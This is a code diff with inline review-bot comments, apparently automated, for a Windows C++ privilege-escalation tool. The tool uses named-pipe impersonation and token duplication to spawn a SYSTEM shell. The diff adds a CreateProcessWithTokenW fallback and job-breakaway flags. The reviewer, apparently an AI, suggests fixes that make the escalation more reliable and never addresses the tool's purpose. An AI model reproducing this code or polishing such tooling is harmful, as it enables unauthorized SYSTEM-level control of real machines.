@@ -58,9 +58,9 @@ void NamedPipeImpersonate()
5858 DWORD messageLenght = lstrlen (message) * 2 ;
5959 DWORD bytesWritten = 0 ;
6060
61- std::wcout << " Creating named pipe " << pipeName << std::endl;
61+ std::wcout << " Creating named pipe and sleeping for 3 seconds " << pipeName << std::endl;
6262 serverPipe = CreateNamedPipe (pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1 , 2048 , 2048 , 0 , NULL );
63-
63+ Sleep ( 3000 );
6464 WinExec (" cmd.exe /c sc start plumber" , 0 );
6565 /* [Deprecated]
6666 if (HINSTANCE retVal2 = ShellExecuteW(NULL, L"open", L"cmd.exe", L"/k sc start plumber", NULL, SW_HIDE))
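Review bot: The new `Sleep(3000)` on line 63 runs whether or not the `CreateNamedPipe` call just above it succeeded; nothing in this hunk compares `serverPipe` with `INVALID_HANDLE_VALUE`, so a failed pipe creation still falls through to the delay and the `WinExec` call. Check the handle first, in the style the rest of this function uses, e.g. `if (serverPipe == INVALID_HANDLE_VALUE) { wprintf(L"[!] CreateNamedPipe() failed. Error: %d\n", GetLastError()); ... }` and leave through whichever exit the function's other failure paths use (a `goto cleanup` appears later in it). The `3000` is a bare magic number that is also spelled out in the log string on line 61; hoisting it into a named constant keeps the message and the delay from drifting apart. NamedPipeImpersonate begins and continues outside this hunk, so an earlier handle check may exist that I cannot see.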
@@ -114,10 +114,10 @@ void NamedPipeImpersonate()
114114 wprintf (L" DuplicateTokenEx() failed. Error: %d\n " , GetLastError ());
115115 goto cleanup;
116116 }
117+
117118
118-
119- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
120-
119+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB;
120+ BOOL bRet;
121121
122122 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
123123 goto cleanup;
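Review bot: `BOOL bRet;` on new line 120 is declared uninitialized, and it cannot simply take an initializer where it stands: the `goto cleanup` on line 115 (and the one on line 123) jumps over this declaration into the scope of `bRet` at the `cleanup:` label, which C++ permits only for a scalar declared without an initializer. Move the declaration up to where the function's other locals (such as `dwCreationFlags`) are declared, above this hunk, and write `BOOL bRet = FALSE;` there. `CREATE_BREAKAWAY_FROM_JOB` is OR-ed into `dwCreationFlags` on new line 119 and again in the LowerProcessIntegrity, DupThreadToken and DupProcessToken hunks without a word on why; the Win32 documentation states the caller's job object must permit breakaway or the `CreateProcess*` call fails, so all four sites gain a failure mode the existing error messages do not name. A one-line comment at each site, e.g. `// CREATE_BREAKAWAY_FROM_JOB: child must not inherit the caller's job; fails unless the job allows breakaway`, would record both the intent and the caveat.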
@@ -137,17 +137,35 @@ void NamedPipeImpersonate()
137137 ZeroMemory (&si, sizeof (STARTUPINFO));
138138 si.cb = sizeof (STARTUPINFO);
139139 si.lpDesktop = const_cast <wchar_t *>(L" WinSta0\\ Default" );
140-
140+
141141 if (CreateProcessAsUser (hSystemTokenDup, NULL , command, NULL , NULL , TRUE , dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi))
142142 {
143143 printf (" [+] successfully created a SYSTEM shell!!!\n " );
144+ fflush (stdout);
145+ WaitForSingleObject (pi.hProcess , INFINITE);
146+ }
147+ else
148+ {
149+ printf (" [!] There was an error creating the SYSTEM shell using CreateProcessAsUser: %d\n Trying another method..." , GetLastError ());
150+ fflush (stdout);
151+ WaitForSingleObject (pi.hProcess , INFINITE);
152+ }
153+ bRet = CreateProcessWithTokenW (hSystemTokenDup, NULL , NULL , command, dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi);
154+
155+ if (bRet == 0 )
156+ {
157+ printf (" [!] CreateProcessWithToken didn't cooperate...permissions maybe???\n " );
158+ printf (" Return value: %d\n " , GetLastError ());
159+ fflush (stdout);
160+ WaitForSingleObject (pi.hProcess , INFINITE);
144161 }
145162 else
146163 {
147- printf (" [!] There was an error creating the SYSTEM shell using CreateProcessAsUser: %d\n " , GetLastError ());
164+ printf (" [+] CreateProcessWithToken worked!!!\n " );
165+ printf (" Return value: %d\n " , bRet);
166+ fflush (stdout);
167+ WaitForSingleObject (pi.hProcess , INFINITE);
148168 }
149- fflush (stdout);
150- WaitForSingleObject (pi.hProcess , INFINITE);
151169cleanup:
152170 if (hSystemToken)
153171 CloseHandle (hSystemToken);
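Review bot: The `else` branch after `CreateProcessAsUser` (new lines 147–152) and the `bRet == 0` branch after `CreateProcessWithTokenW` (new lines 155–160) each call `WaitForSingleObject(pi.hProcess, INFINITE)` even though the preceding call failed and so did not fill in `pi`; unless `pi` was zeroed earlier in the function (not shown here) the wait is on a stale or garbage handle, and if it was zeroed it simply fails at once, so the wait should be dropped from both failure branches. The fallback on new line 153 is also reached unconditionally: after a successful `CreateProcessAsUser` the code waits for that process to exit and then still calls `CreateProcessWithTokenW`, overwriting `pi` without closing the first `pi.hProcess`/`pi.hThread` (handle leak), although the message on new line 149 presents the second call as a fallback. Record the first result and guard the second call with it, e.g. `BOOL created = CreateProcessAsUser(hSystemTokenDup, NULL, command, NULL, NULL, TRUE, dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi);`, `if (created) { ... }`, `if (!created) bRet = CreateProcessWithTokenW(...);`, and close both `pi` handles after each wait. The `cleanup:` section of NamedPipeImpersonate continues outside this hunk.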
@@ -358,8 +376,7 @@ int LowerProcessIntegrity(DWORD pid, int integritylevel)
358376 if (SetTokenInformation (hNewToken, TokenIntegrityLevel, &TIL,
359377 sizeof (TOKEN_MANDATORY_LABEL) + GetLengthSid (pIntegritySid)))
360378 {
361- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
362-
379+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB;
363380
364381 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
365382 {
@@ -481,14 +498,15 @@ int DupThreadToken(DWORD pid)
481498 {
482499 wprintf (L" [!] OpenThreadToken(). Error: %d\n " , GetLastError ());
483500 }
484-
501+
485502 if (!DuplicateTokenEx (hSystemToken, TOKEN_ALL_ACCESS, NULL , SecurityImpersonation, TokenPrimary, &hSystemTokenDup))
486503 {
487504 wprintf (L" [!] DuplicateTokenEx() failed. Error: %d\n " , GetLastError ());
488505 }
506+
507+
489508
490-
491- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
509+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB;
492510
493511 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))
494512 {
@@ -630,7 +648,7 @@ int DupProcessToken(DWORD pid)
630648 {
631649 printf (" [+] DuplicateTokenEx success!!!\n " );
632650 }
633- dwCreationFlags = CREATE_UNICODE_ENVIRONMENT;
651+ dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | CREATE_BREAKAWAY_FROM_JOB ;
634652
635653
636654 if (!(pwszCurrentDirectory = (LPWSTR)malloc (MAX_PATH * sizeof (WCHAR))))